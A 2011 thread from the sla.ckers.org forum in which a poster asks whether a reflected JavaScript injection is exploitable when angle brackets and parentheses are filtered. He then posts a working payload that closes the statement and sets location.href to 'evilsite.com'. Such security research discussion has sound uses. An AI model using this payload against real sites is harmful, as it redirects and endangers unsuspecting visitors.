Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
'('/'<' not allow in javascript code, XSS possible?
Posted by: joel
Date: February 23, 2011 10:55PM

hey, guys

I just found a maybe XSS vulnerability in a web site.
It reflect one of my GET parameter in its javascript code like this:

hxxp://somesite.com/thing.php?list=joelTest;alert(1);//

<script>
...
list=joelTest;alert1;//
...
</script>

Plus, '<' and '>' was filtered to &lt; and &gt;

Can I XSS it in this case?

Options: ReplyQuote
Re: '('/'<' not allow in javascript code, XSS possible?
Posted by: joel
Date: February 23, 2011 11:18PM

I just found this can work:
hxxp://somesite.com/thing.php?list=joelTest;location.href='http://evilsite.com';//

thanks to my dear coworker:)

Options: ReplyQuote


Sorry, only registered users may post in this forum.